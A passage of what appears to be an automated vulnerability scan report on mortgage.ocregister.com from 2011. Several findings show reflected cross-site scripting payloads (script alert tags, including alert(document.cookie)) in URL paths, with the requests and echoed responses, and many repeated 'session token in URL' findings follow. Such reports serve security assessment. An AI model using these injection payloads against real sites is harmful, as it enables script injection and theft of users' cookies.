<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" />
...[SNIP]...

1.193. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/wp-content/themes/onSet/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" />
...[SNIP]...

1.194. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" />
...[SNIP]...

1.195. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/wp-includes/wlwmanifest.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" />
...[SNIP]...

1.196. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mortgage.ocregister.com
Path:	/xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" />
...[SNIP]...

2. Session token in URL previous next
There are 65 instances of this issue:

/
/2007/02/
/2007/03/
/2007/04/
/2007/05/
/2007/06/
/2007/07/
/2007/08/
/2007/09/
/2007/10/
/2007/11/
/2007/12/
/2008/01/
/2008/02/
/2008/03/
/2008/04/
/2008/05/
/2008/06/
/2008/07/
/2008/08/
/2008/09/
/2008/10/
/2008/11/
/2008/12/
/2009/01/
/2009/02/
/2009/03/
/2009/04/
/2009/05/
/2009/06/
/2009/07/
/2009/08/
/2009/09/
/2009/10/
/2009/11/
/2009/12/
/2010/01/
/2010/02/
/2010/03/
/2010/04/
/2010/05/
/2010/06/
/2010/07/
/2010/08/
/2010/09/
/2010/10/
/2010/11/
/2010/12/
/2011/01/
/2011/01/08/upside-down-but-still-on-a-good-path/41162/
/2011/01/13/late-o-c-mortgage-payments-drop/41334/
/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/
/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/
/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/
/2011/01/25/foreclosures-down-31-in-state/41514/
/2011/01/26/7900-o-c-homes-seized-in-2010/41532/
/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/
/2011/01/29/couple-might-be-better-off-with-short-sale/41502/
/2011/02/
/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/
/feeda71cd"><script>alert(document.cookie
/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
/feeda71cd%2522%253E%253Cscript%253Ealert(1
/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie
/files

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

2.1. http://mortgage.ocregister.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET / HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:07:07 +0000
Cache-Control: max-age=294, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html
Content-Length: 99712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.2. http://mortgage.ocregister.com/2007/02/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/02/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.3. http://mortgage.ocregister.com/2007/03/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/03/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.4. http://mortgage.ocregister.com/2007/04/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/04/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.5. http://mortgage.ocregister.com/2007/05/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/05/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.6. http://mortgage.ocregister.com/2007/06/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/06/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.7. http://mortgage.ocregister.com/2007/07/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/07/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.8. http://mortgage.ocregister.com/2007/08/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/08/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.9. http://mortgage.ocregister.com/2007/09/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/09/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.10. http://mortgage.ocregister.com/2007/10/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/10/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.11. http://mortgage.ocregister.com/2007/11/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/11/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>

<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.12. http://mortgage.ocregister.com/2007/12/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mortgage.ocregister.com
Path:	/2007/12/

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1

Request

GET /2007/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
